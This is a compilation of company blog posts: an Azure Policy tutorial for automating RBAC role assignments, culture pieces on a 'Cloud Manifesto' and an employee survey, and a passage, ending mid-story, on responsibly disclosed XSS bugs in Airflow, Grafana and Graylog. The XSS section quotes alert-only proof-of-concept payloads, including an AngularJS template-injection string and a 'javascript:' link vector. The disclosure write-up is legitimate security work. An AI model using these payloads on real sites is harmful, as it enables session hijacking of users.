Using Azure policies to audit and automate RBAC role assignments

Usually different RBAC role assignments in Azure might be inherited from subscription / management group level but there may come a time when that's just way too broad spectrum to give permissions to an AD user group.

While it’s tempting to assign permissions on a larger scope, sometimes you might rather prefer to have only some of the subscription’s resource groups granted with a RBAC role with minimal permissions to accomplish the task at hand. In those scenarios you’ll usually end up with one of the following options to handle the role assignments:

  1. Include the role assignments in your ARM templates / Terraform codes / Bicep templates
  2. Manually add the role to proper resource groups

If neither these appeal to you, there’s a third option: define an Azure policy which identifies correct resource groups and then deploys RBAC role assignments automatically if conditions are met. This blog will go over with step-by-step instructions how to:

  • Create a custom Azure policy definition for assigning Contributor RBAC role for an Azure AD group
  • Create a custom RBAC role for policy deployments and add it to your policy definition
  • Create an assignment for the custom policy

The example scenario is very specific and the policy definition is created to match this particular scenario. You can use the solution provided in this post as a basis to create something that fits exactly to your needs.

Azure policies in brief

Azure policies are a handy way to add automation and audit functionality to your cloud subscriptions. The policies can be applied to make sure resources are created following the company’s cloud governance guidelines for resource tagging or picking the right SKUs for VMs as an example. Microsoft provides a lot of different type built-in policies that are pretty much ready for assignment. However, for specific needs you’ll usually end up creating a custom policy that better suits your needs.

Using Azure policies is divided into two main steps:

  1. You need to define a policy which means creating a ruleset (policy rule) and actions (effect) to apply if a resource matches the defined rules.
  2. Then you must assign the policy to desired scope (management group / subscription / resource group / resource level). Assignment scope defines the maximum level of scanning if resources match the policy criteria. Usually the preferable levels are management group / subscription.

Depending on how you prefer governing your environment, you can resolve to use individual policies or group multiple policies into initiatives. Initiatives help you simplify assignments by working with groups instead of individual assignments. It also helps with handling service principal permissions. If you create a policy for enforcing 5 different tags, you’ll end up with having five service principals with the same permissions if you don’t use an initiative that groups the policies into one.

Creating the policy definition for assignment of Contributor RBAC role

The RBAC role assignment can be done with policy that targets the wanted scope of resources through policy rules. So first we’ll start with defining some basic properties for our policy which tells the other users what this policy is meant for. Few mentions:

  • Policy type = custom. Everything that’s not built-in is custom.
  • Mode = all since we won’t be creating a policy that enforces tags or locations
  • Category can be anything you like. We’ll use “Role assignment” as an example
{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {}
	}
}

Now we have our policy’s base information set. It’s time to form a policy rule. The policy rule consists of two blocks: policyRule and then. First one is the actual rule definition and the latter is the definition of what should be done when conditions are met. We’ll want to target only a few specific resource groups so the scope can be narrowed down with tag evaluations and resource group name conventions. To do this let’s slap an allOf operator (which is kind of like the logical operator ‘and’) to the policy rule and set up the rules

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					},	{
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {}
		}
	}
}

As can be seen from the JSON, the policy is applied to a resource (or actually a resource group) if

  • It’s type of Microsoft.Resources/subscriptions/resourceGroups = the target resource is a resource group
  • It has a tag named RbacAssignment set to true
  • The resource group name starts with my-rg-prefix

In order for the policy to actually do something, an effect must be defined. Because we want the role assignment to be automated, the deployIfNotExists effect is perfect. Few mentions of how to set up an effect:

  • The most important stuff is in the details block
  • The type of the deployment and the scope of an existence check is Microsoft.Authorization/roleAssignments for RBAC role assignments
  • An existence condition is kind of an another if block: the policy rule checks if a resource matches the conditions which makes it applicable for the policy. Existence check then confirms if the requirements of the details are met. If not, an ARM template will be deployed to the scoped resource

The existence condition of then block in the code example below checks the role assignment for a principal id through combination of Microsoft.Authorization/roleAssignments/roleDefinitionId and Microsoft.Authorization/roleAssignments/principalId. Since we want to assign the policy to a subscription, roleDefinitionId path must include the /subscriptions/<your_subscription_id>/.. in order for the policy to work properly.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Role assignment"
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "deployIfNotExists",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"roleDefinitionIds": [
						"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
					],
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					}
				}
			}
		}

The last thing to add is the actual ARM template that will be deployed if existence conditions are not met. The template itself is fairly simple since it’s only containing the definitions for a RBAC role assignment.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Tags",
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "deployIfNotExists",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"roleDefinitionIds": [
						"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
					],
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					},
					"deployment": {
						"properties": {
							"mode": "incremental",
							"template": {
								"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
								"contentVersion": "1.0.0.0",
								"parameters": {
									"adGroupId": {
										"type": "string",
										"defaultValue": "OBJECT_ID_OF_YOUR_AD_GROUP",
										"metadata": {
											"description": "ObjectId of an AD group"
										}
									},
									"contributorRbacRole": {
										"type": "string",
										"defaultValue": "[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c')]",
										"metadata": {
											"description": "Contributor RBAC role definition ID"
										}
									}
								},
								"resources": [{
										"type": "Microsoft.Authorization/roleAssignments",
										"apiVersion": "2018-09-01-preview",
										"name": "[guid(resourceGroup().id, deployment().name)]",
										"properties": {
											"roleDefinitionId": "[parameters('contributorRbacRole')]",
											"principalId": "[parameters('adGroupId')]"
										}
									}
								]
							}
						}
					}
				}
			}
		}
	}
}

And that’s it! Now we have the policy definition set up for checking and remediating default RBAC role assignment for our subscription. If the automated deployment feels too daunting, the effect can be swapped to auditIfNotExist version. That way you won’t be deploying anything automatically but you can simply audit all the resource groups in the scope for default RBAC role assignments.

{
	"properties": {
		"displayName": "Assign Contributor RBAC role for an AD group",
		"policyType": "Custom",
		"mode": "All",
		"description": "Assigns Contributor RBAC role for AD group resource groups with Tag 'RbacAssignment = true' and name prefix 'my-rg-prefix'. Existing resource groups can be remediated by triggering a remediation task.",
		"metadata": {
			"category": "Tags",
		},
		"parameters": {},
		"policyRule": {
			"if": {
				"allOf": [{
						"field": "type",
						"equals": "Microsoft.Resources/subscriptions/resourceGroups"
					}, 	{
						"field": "name",
						"like": "my-rg-prefix*"
					}, {
						"field": "tags['RbacAssignment']",
						"equals": "true"
					}
				]
			},
			"then": {
				"effect": "auditIfNotExist",
				"details": {
					"type": "Microsoft.Authorization/roleAssignments",
					"existenceCondition": {
						"allOf": [{
								"field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
								"equals": "/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c" // RBAC role definition ID for Contributor role
							}, {
								"field": "Microsoft.Authorization/roleAssignments/principalId",
								"equals": "OBJECT_ID_OF_YOUR_AD_GROUP" // Object ID of desired AD group
							}
						]
					}
				}
			}
		}
	}
}

That should be enough, right? Well it isn’t. Since we’re using ARM template deployment with our policy, we must add a role with privileges to create remediation tasks which essentially means we must add a role that has privileges to create and validate resource deployments. Azure doesn’t provide such policy with minimal privileges out-of-the-box since the scope that has all the permissions we need is Owner. We naturally don’t want to give Owner permissions to anything if we reeeeeally don’t have to. The solution: create a custom RBAC role for Azure Policy remediation tasks.

Create custom RBAC role for policy remediation

Luckily creating a new RBAC role for our needs is a fairly straightforward task. You can create new roles in Azure portal or with Powershell or Azure CLI. Depending on your desire and permissions to go around in Azure, you’ll want to create the new role into a management group or a subscription to contain it to a level where it is needed. Of course there’s no harm done to spread that role to wider area of your Azure environment, but for the sake of keeping everything tidy, we’ll create the new role to one subscription since it’s not needed elsewhere for the moment.

Note that the custom role only allows anyone to validate and create deployments. That’s not enough to actually do anything. You’ll need to combine the deployment role with a role that has permissions to do the stuff set in deployment. For RBAC role assignments you’d need to add “User Access Administrator” role to the deployer as well.

Here’s how to do it in Azure portal:

  1. Go to your subscription listing in Azure, pick the subscription you want to add the role to and head on to Access control (IAM) tab.
  2. From the top toolbar, click on the “Add” menu and select “Add custom role”.
  3. Give your role a clear, descriptive name such as Least privilege deployer or something else that you think is more descriptive.
  4. Add a description.
  5. Add permissions Microsoft.Resources/deployments/validate/action and Microsoft.Resources/deployments/write to the role.
  6. Set the assignable scope to your subscription.
  7. Review everything and save.

After the role is created, check it’s properties and take note of the role id. Next we’ll need to update the policy definition made earlier in order to get the new RBAC role assigned to the service principal during policy initiative assignment.

So from the template, change this in effect block:

"roleDefinitionIds": [
	"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" // Use user access administrator role update RBAC role assignments
]

to this:

"roleDefinitionIds": [
	"/providers/microsoft.authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9", // Use user access administrator role update RBAC role assignments
	"/subscriptions/your_subscription_id/providers/Microsoft.Authorization/roleDefinitions/THE_NEW_ROLE_ID" // The newly created role with permissions to create and validate deployments
]

Assigning the created policy

Creating the policy definition is not enough for the policy to take effect. As mentioned before, the definition is merely a ruleset created for assigning the policy and does nothing without the policy assignment. Like definitions, assignments can be set to desired scope. Depending on your policy, you can set the policy for management group level or individual assignments to subscription level with property values that fit each individual subscription as needed.

Open Azure Policy and select “Assignment” from the left side menu. You can find “Assign policy” from the top toolbar. There’s a few considerations that you should go over when you’re assigning a policy:

Basics

  • The scope: always think about your assignment scope before blindly assigning policies that modify your environment.
  • Exclusion is a possibility, not a necessity. Should you re-evaluate the policy definition if you find yourself adding a lot of exclusions?
  • Policy enforcement: if you have ANY doubts about the policy you have created, don’t enforce the policy. That way you won’t accidentally overwrite anything. It might be a good idea to assign policy without enforcement for the first time, review compliance results and if you’re happy with them, then enforce the policy.
    • You can fix all the non-compliant resources with a remediation task after initial compliance scan

Remediation

  • If you have a policy that changes something either with modify of deployIfNotExists effect, you’ll be creating a service principal for implementing the changes when you assign the policy. Be sure to check the location (region) of the service principal that it matches your desired location.
  • If you select to create a remediation tasks upon assignment, it will implement the changes in policy to existing resources. So if you have doubts if the policy works as you desire, do not create a remediation task during assignment. Review the compliance results first, then create the remediation task if everything’s ok.

Non-compliance message

  • It’s usually a good idea to create a custom non-compliance message for your own custom definitions.

After you’ve set up all relevant stuff for the assignment and created it, it’s time to wait for the compliance checks to go through. When you’ve created an assignment, the first compliance check cycle is done usually within 30 minutes of the assignment creation. After the first cycle, compliance is evaluated once every 24 hours or whenever the assigned policy definitions are changed. If that’s not fast enough for you, you can always trigger an on-demand evaluation scan.

Solita Cloud Manifesto – We all love tinkering

“Tinkering” is a term for a form of tweaking. One user of the Finnish urban dictionary website puts it as “what computer people call programming or some such tweaking”. Tinkering and tweaking are words often used by specialists working with automatic data processing, and especially infrastructure and operating systems; sometimes several times a day. Many use tinkering as a general description of everything that an infrastructure expert does for a job; some of us drive cars, some of us wash cars, some of us tinker with infrastructure.

In order to find new approaches to the hard core of tinkering, I had a talk with two fresh faces at Solita Cloud, Tommi Ritvanen and Lauri Moilanen. We focused on the question of what tinkering actually is, reaching pretty far down the rabbit hole, and also discussed what is included in tinkering. Finally, we naturally considered how the newly-published Solita Cloud Manifesto has manifested in the everyday work of our professionals.

We gave a lot of thought to whether tinkering is a professional activity. It could also be seen as an amateurish term – something that refers to artisanal “gum and tape” contraptions rather than professional, fully automated and easily replicated solutions. Lauri Moilanen said that he puts in as much work as possible to minimise tinkering. This is not the full picture, as he continues to state that tinkering is a very interesting phase, but it’s only the first phase. What is even more interesting is how the chosen initial setup can be refined into a professional final product. Tommi Ritvanen had a different perspective. If there is no ready-made solution for the required product, he sees tinkering as producing the automated final product.

In the Solita Cloud Manifesto, we posit that “tinkering is a combination of interest and learning experiences”.

Tommi suggests that tinkering is not always smooth sailing. One has to – or gets to – work on, polish, iterate and grapple with the final product. One cornerstone of learning at Solita is learning by doing, and we believe that 70 per cent of creative experts’ learning happens through everyday work and experiments. An academic attitude in thinking is highly advantageous when learning from books or documentation and to come up with hypothetical solutions for a given problem – or when considering the problem itself.

True individual learning events are related to learning by doing, and, in particular, to learning by doing something outside one’s comfort zone. Purely technical slogging is rarely what happens in Solita projects. Because our business is about people creating solutions for others who use them, the object of tinkering is often not only our customers’ processes and operating methods, but also those of Solita.

Tommi and Lauri have different profiles at Solita Cloud. Their career paths are different, but both think that they now find themselves in a position where they have wanted to be. Working at Solita is the sum of their own choices. Currently, Tommi works in the Cloud maintenance team and Lauri works as an infrastructure specialist in two projects.

Is it okay to say no at Solita, and is it possible to pursue your own interests?

Tommi says that the maintenance team has people from different backgrounds. The team members can take their work in whatever direction they wish, but their activities are limited by the reactive side of maintenance. “Maintenance requires you to take care of things, even if you don’t want to,” says Lauri, who has experience in maintenance work prior to Solita. Maintenance team members must be flexible and willing to learn and do things. There is no hiding in a silo. “You encounter many new things in maintenance, so you take them on and want to try everything,” says Tommi.

In projects, the resourcing stage largely dictates what the specialist will be doing. Although the situation may be an overly complex puzzle with indirect consequences for every move, at its best, the resourcing stage can be a dialogue between the specialist, the account, and Cloud’s resourcing manager, Jukka Kantola. The importance of communication is highlighted even before the actual work begins.

Lauri says that there is a sense of psychological safety at Solita Cloud. According to him, it is okay to say “no” to resourcing, and there is no hidden pressure in the environment forcing people to do what they would rather not. He points to the important observation that he is not afraid to say no in this environment.

The customer’s end goal may not be clear at the resourcing stage, so the team of specialists is expected to continuously investigate it and find facts – and maintain situational awareness. In other words, the work’s expectations may not be precisely worded, or the vision of the desired end result may change already in the early stages of the project. Changes are likely as the project progresses, whether the identified project model is like a waterfall or agile.

Those individuals working in Solita projects are authorised and obligated to discover and clarify what needs to be done and why, as in what needs to be achieved by the end result. The will to understand the whole connects all Solita employees, and Solita project managers are especially skilled at taking hold of all the strings and leading communication.

The specialists have personal motivations that we have collected somewhat frequently through, for example, our Moving Motivators exercises. Lauri offers his thoughts on how to express the feeling of “doing a job with a purpose”: “When you turn off your computer, you are left with a feeling that you did something meaningful and accomplished things,” says Lauri about his personal motivation. Motivated people produce better results, which equally benefit Solita, our customers, and the employee in question. Motivation, but also confusion, often manifest in people attempting to challenge external requirements and pushing themselves physically to reach high-quality results. “An attitude of ‘just get something done’ kills motivation and often surfaces when there’s a rush,” says Lauri.

In the crossfire of moving targets and ambiguous goals, we at Solita have to understand the limits of our personal ability and be able to take on technically challenging situations in projects as a community. We at Solita Cloud are a group of people from a variety of backgrounds with different motivations, and we may not be focused on a single clear target in our everyday work. But we all love tinkering.

The key technologies and skills in our Cloud community

The cloud market is evolving and we want to stay at the forefront of the development. One way to do this is to get the pulse from our employees and hear what they have to say about cloud technologies, attractive roles, and important skills in the field. In our recent survey among our Cloud Specialists and Consultants, we got a sneak peek into their thoughts.

When asking about the most used technologies, GNU/Linux ranked as number one, and it doesn’t surprise me. It’s a core technology after all, and people in the field are generally eager to use it. Regardless of what we do in the cloud, GNU/Linux distributions provide the foundation where we build. Terraform and Ansible are also frequently used, which means that Solitans are keen on using automation. Instead of manual work, we tend to build automated processes to work smarter and minimize the risk of human errors. Git and Jenkins are also high on the list, indicating that in conjunction with automation-agile DevOps, and in extension GitOps, practices are loved and followed.

Looking at the cloud technologies, I’m quite happy to see that Google Cloud Platform ranks as one of the most used, or at least coveted after, cloud technologies by our cloud specialists and consultants alike. AWS has traditionally been the most popular cloud tech in Finland, but I’m glad that the available alternatives are also gaining traction now. Azure has its place too, but surprisingly it’s not exceptionally high in the minds of our specialists even though its market share is significantly larger than, for example, Google Cloud Platforms.

Personally, I think Google Cloud has great advantages, especially here in Finland. They have a data center in Hamina, which plays an important role for those customers who deal with sensitive data and want their data to be stored in Finland. Google is the only provider that can offer this option. I believe that Google Cloud Services will become increasingly popular, which will reflect on the talent market. Already now, we can see a shortage of talent in this area, which is why Solita launched its own training program together with Academic Work. This way, we are able to train Google specialists ourselves.

Based on the results of the survey, Docker and Kubernetes continue their victory march as the go-to technology for delivering and modernizing applications regardless of the customer case. The Google Kubernetes Engine seems to have especially gained traction, thanks to its ease of use compared to the competition when using or considering using a platform to deploy customers’ Docker containers.

Senior Cloud Service Specialists and Architects are the most attractive roles

In this survey, most of the respondents (60%) were Cloud Service Specialists, a quarter of the respondents Senior Cloud Service Specialists and a smaller minority (12,5 %) Senior Cloud Consultants (12,5%). For them, the most attractive next steps are Senior Cloud Service Specialists and Architects.

In general, the difference between a Cloud Service Specialist and a Consultant is that in many cases, Consultants deal more with PowerPoints and plan the big picture with the customer. Cloud Service Specialists focus more on the technical side of the work and deliver the projects. However, it’s not set in stone. We can be quite flexible with our roles at Solita, and within a certain framework, we can design our own roles based on our interests.

I work as a Senior Cloud Consultant myself, but I tend to be involved in the technical side quite often, as I enjoy rolling my sleeves and “get my hands into the mud”, as they say. Not any one day is similar to the next; A cliché I know, but true in my case at least. Any given day, I might be called upon to write code for our customer project if it involves cloud-native features. Or I might end up deploying a Terraform template to install something, and I might also create or present a PowerPoint deck and eat some delicious bear claw pastries with some coffee while at it. A suit and a tie are optional!

The ability to manage one’s own work is an important skill

Our professionals consider the ability to lead one’s own work the most important skill. It’s also a skill where people need the most training. The pace has been quite hectic in recent years as we are growing as a company. While resourcing and people leaders are looking after the teams, people also need skills to manage their time and work. This has been noticed at Solita, and the company is providing support and courses around this topic.

I’ve experienced that the culture at Solita is supportive, which helps in preventing burnout. Caring is one of our core values and highly visible in daily work. It means that people are encouraged to ask for help, and there is always support available. Solita is not a workplace where constant overtime and long hours are celebrated.

Other competencies that rank high in the survey are customer consulting skills, presentation skills, and knowledge sharing skills. It makes complete sense in our context; to work successfully with customers, which is our main job, we need the consulting and presentation skills to communicate our vision efficiently and credibly. Knowledge sharing skills, on the other hand, play a crucial role in teamwork. And we are definitely looking for team players who are willing to contribute towards a common goal.

Understanding the big picture becomes more and more important

The industry is evolving, and I can see even larger corporations becoming more interested in cloud services. If cloud solutions used to be the thing in start-ups and smaller companies, the big players have now woken up to see the benefits. That changes our ways of working and brings up interesting challenges to tackle as we need to dive deeper into compliance, regulations, and cybersecurity topics. But the goals remain the same, guiding customers towards modern and agile solutions that support their business targets.

Generally, I think it’s important to understand that cloud services are a big entity, not just single technologies or hype words. If you want to develop your skills in this industry, project work is the way to do it. The trick here is to understand the bigger picture and put different tools and technologies together to build solutions that serve the customer. And it’s not about knowing everything about a single technology, but more about the mindset; how can we leverage different tools to gain the best results and learn as we go.

Growth with our customers continues and we are constantly looking for new colleagues in our cloud community! Check out our open positions here!

Solita Cloud Manifesto

Our shared idea crystallised in autumn 2020. In little more than five years, Solita Cloud has grown from a support function comprising five infrastructure specialists into an expert organisation with profitable business operations, consisting of more than 50 amazing experts in different positions and from different backgrounds. The change in thinking and everyday life has been significant, and change is never an easy thing to process. Even change accrues compound interest, and the longer you have been involved, the more radical the change seems to be.

People’s attitude to change and growth is what takes organisations forward. Operations are developing further. At Solita Cloud, however, we have missed having an anchor that keeps us all together – the original Cloud spirit of which we hear beautiful stories or heroic war tales by the breakroom table. During the pioneering days, we moved quickly forward and weren’t able to avoid all the painful stumbles. However, the common goal at the start steered us step by step. As we developed further, new competence needs emerged. We needed new people who, in turn, developed the culture further. The common anchor started to drift away. A need emerged to hit pause for a while to consider our common anchor in depth and to think about how we could better glue the community together again. Solita Cloud Manifesto emerged as one solution to the issue – after all, Solita’s software developers had made their own to be an excellent guideline for all Solita people.

Manifesto is a signpost created by the community itself, a way to express the company culture in words, ‘a household code’. It includes the key guidelines that we wish to follow as a community and that we also gently demand from our own actions. The manifesto evolves with the community and its surrounding world. I think that Norm Kerth’s Retrospective Prime Directive also reveals the deepest nature of the manifesto. Retrospective Prime Directive: “Regardless of what we discover, we understand and truly believe that everyone did the best job they could, given what they knew at the time, their skills and abilities, the resources available, and the situation at hand.” Thinking back, compiling the Cloud Manifesto seemed to be a certain kind of retrospective series and a learning journey into the core of Solita Cloud, or at least the perspective of it by one group.

The work to create the manifesto was launched at the end of a seminar day held in October, via a separate address. First, Janne Rintala held an opening address of the deepest essence of the Dev Manifesto and of the matters we should keep in mind. Janne’s empowering speech allowed us to gather a list of names of interested people with whom the work would be continued. When the seminar day was planned, the original idea was to hold a 1.5-hour workshop with 20 to 30 people during which the manifesto would be drafted or even finished. Retrospectively, it is good that we chose to give the manifesto a little more time and continue working on it with a smaller group of about five active participants. There would be time to go through the manifesto with everyone later, probably multiple times. From the start, it has been a key factor that the manifesto should serve Solita Cloud’s experts.

An hour for the work, repeated every Monday, was added to the calendars of the members of the group of active participants. We started from a clean slate and proceeded through discussions. We did not agree on everything, and sometimes we focused on everyday issues as examples, hoping that the manifesto’s value base would bring a solution to them. Through our good conversational culture and by valuing each other, we were able to find the words to express the four values in the manifesto. There were more proposals as values along the way; some were written into the theses under the values, while others were included in the public notes, reflecting the way our operations at Solita have been completely open from the start.

The format of Solita Cloud Manifesto was quite directly borrowed from the Dev Manifesto: four values with four theses each. I can’t claim that we haven’t borrowed some of the software developers’ guidelines, too. However, we made the manifesto our own and targeted it at Cloud experts. Finally, the manifesto also shows Solita’s value base:

  • Caring – Easy-going – Passion – Courage

At publication, it could be assumed that the published article is now finished. However, with something like this, I hope it is not. I hope that it will never be finished, but rather changes agilely with the times. At its best, it actively serves its followers.

The manifesto supports us in our daily lives, tells us which way to go and what to change, challenges us to pause and to think about where we currently are. We at Solita Cloud have agreed that the Cloud Manifesto can be changed, with the template agreed. We want to always include several people in this change and encourage discussion amongst the selected group, and we wish them to communicate the changes and the needed modifications to everyone else.

We needed 13 sessions to reach the first publishable result. This translates to around 60–80 working hours. We believe that this investment will save us these working hours several times in the future. We should still continue to pause in our daily lives, as exchanging experiences and learning from them together will benefit us continuously. With Cloud Manifesto, we, the Solita Cloud experts, wish to highlight the matters we all want to believe in. In the world of consultants, the daily work of specialists does not necessarily hold many common denominators. The purpose of Solita Cloud Manifesto was to ground us to our roots, strengthen our community and highlight matters important to it in our projects and client relationships. Even though the everyday work of an expert may take place elsewhere, a Solita Cloud expert will always know where to find support.

The story of Solita Cloud Manifesto will not end here. In the next blog posts, we will learn more about the values and theses of the Cloud Manifesto, as well as how they can be seen in the day-to-day expert work.

In search of XSS vulnerabilities

This is a blog post introducing our Cloud Security team and a few XSS findings we have found this year in various open source products.

Our team and what we do

Solita has a lot of security minded professionals working in various roles. We have a wide range of security know-how from threat assessment and secure software development to penetration testing. The Cloud Security team is mostly focused on performing security testing on web applications, various APIs, operating systems and infrastructure.

We understand that developing secure software is hard and do not wish to point fingers at the ones who have made mistakes, as it is not an easy task to keep software free of nasty bugs.

You’re welcome to contact us if you feel that you are in need of software security consultation or security testing.

Findings from Open Source products

Many of the targets that we’ve performed security testing for during the year of COVID have relied on a variety of open source products. Open source products are often used by many different companies and people, but very few of them do secure code review or penetration testing on these products. In general, a lot of people use open source products but only a few give feedback or patches, and this can give a false sense of security. However, we do think that open source projects that are used by a lot of companies have a better security posture than most closed source products.

Nonetheless, we’ve managed to find a handful of vulnerabilities from various open source products and as responsible, ethical hackers, we’ve informed the vendors and their software security teams about the issues.

The vulnerabilities found include e.g. Cross-Site Scripting (XSS), information disclosure and a payment bypass in one CMS plugin. But we’ll keep the focus of this blog post in the XSS vulnerabilities since these have been the most common.

What is an XSS vulnerability

Cross-site scripting vulnerability, shortened as XSS, is a client-side vulnerability. XSS vulnerabilities allow attackers to inject client-side JavaScript code that gets executed on the victim’s client, usually a browser. Being able to execute JavaScript on a victim’s browser allows attackers, for example, to use the same functionalities on the web site as the victim by riding on the victims’ session. Requests made with XSS vulnerability also come from the victims IP-address allowing to bypass potential IP-blocks.

All of the following vulnerabilities have been fixed by the vendors and updated software versions are available.

Apache Airflow

Apache Airflow is an open-source workflow management platform, that is being used by hundreds of companies such as Adobe, HBO, Palo Alto Networks, Quora, Reddit, Spotify, Tesla and Tinder. During one of our security testing assignments, we found that it was possible to trigger a stored XSS in the chart pages. 

There are a lot of things you can configure and set in the Apache Airflow, usually, we try to input injections in every place we can test and have some random text to be identified on which part was manipulated with a payload so we can later figure out which is the root cause of the injection.

In the Apache Airflow we found out that one error page did not properly construct the error messages on some misconfiguration cases, this causes the error message to trigger JavaScript. Interestingly in another place, the error message was constructed correctly and the payload did not trigger there, this just shows how hard it is to identify every endpoint where functionalities happen. Changing your name to XSS payload does not usually trigger the most common places where you can see your name such as profile and posts, but you should always look for other uncommon places you can visit. These uncommon places are not usually as well validated for input just due to a simple fact of being less used and not even that well-remembered they exist.


Timeline

15.04.2020 – The vulnerability was found and reported to Apache

20.04.2020 – Apache acknowledged the vulnerability

10.07.2020 – The bug was fixed in the update 1.10.11 and it was assigned the CVE-2020-9485

Grafana

Grafana is an open-source platform for monitoring and observation. It is used by thousands of companies globally, including PayPal, eBay, Solita, and our customers. During one of our security testing assignments, we found that it was possible to trigger a stored XSS via the annotation popup functionality.

The product sports all sorts of dashboards and graphs for visualizing the data. One feature of the graphs is the ability to include annotations for the viewing pleasure of other users.

While playing around with some basic content injection payloads, we noticed that it was possible to inject HTML tags into the annotations. These tags would then render when the annotation was viewed. One such tag was the image tag “<img>”, which can be used for running JavaScript via event handlers such as “onerror”. Unfortunately for us, the system had some kind of filtering in place and our malicious JavaScript payloads did not make it.

While inspecting the page DOM and source of the page, looking for a way to bypass the filtering, I noticed that AngularJS templates were in use as there were references to ‘ng-app’ mentioned. Knowing that naive use of AngularJS could lead to a so-called client-side template injection, I decided to try out a simple payload with a calculus operation in it ‘{{ 7 * 191 }}’. To my surprise, the payload got triggered and the annotation had the value of the calculation present, 1337!

A mere calculator was not sufficient though and I wanted to pop that tasty alert window with this newly found injection. There used to be a protective expression sandbox mechanism in AngularJS, but they probably grew tired of the never-ending cat and mouse play and sandbox escapes that hackers were coming up with, so they removed the sandbox in version 1.6 altogether. And as such providing a payload ‘{{constructor.constructor(‘alert(1)’)()}}’ did just the trick and at this point, I decided to write a report for the Grafana security team.

Timeline

16.04.2020 – The vulnerability was found and reported to the security team at Grafana

17.04.2020 – Grafana security team acknowledged the vulnerability

22.04.2020 – CVE-2020-12052 was assigned to the vulnerability

23.04.2020 – A fix for the vulnerability was released in Grafana version 6.7.3

Graylog

Graylog is an open-source log management platform that is used by hundreds of companies including LinkedIn, Tieto, SAP, Lockheed Martin, and Solita. During one of our security assignments, we were able to find 2 stored XSS vulnerabilities.

During this assessment we had to dig deep in the documentations of Graylog to see what kinds of things were doable in the UI and how to properly make the magic happen. At one point we found out that it’s possible to generate links from the data Graylog receives and this is a classic way to gain XSS by injecting a payload such as ‘javascript:alert(1)’ in the ‘href’ attribute. This, however, requires the user to interact with the generated link by clicking it, but this still executes the JavaScript and does not make the effect of the execution any less dangerous. 

Mika went through Graylog’s documentation and found out about a feature which allowed one to construct links from the data sources, but couldn’t figure out right away how to generate the data to be able to construct this link. He told me about the link construction and told about his gut feeling that there would most likely be an XSS vector in there. After a brief moment of tinkering with the data creation Mika decided to take a small coffee break, mostly because doughnuts were served. During this break I managed to find a way to generate the links correctly and trigger the vulnerability, thus finding a stored XSS in Graylog.



Graylog also supports content packs and the UI provides a convenient way to install third-party content by importing a JSON file. The content pack developer can provide useful information in the JSON such as the name, description, vendor, and URL amongst other things. That last attribute played as a hint of what’s coming, would there be a possibility to generate a link from that URL attribute?

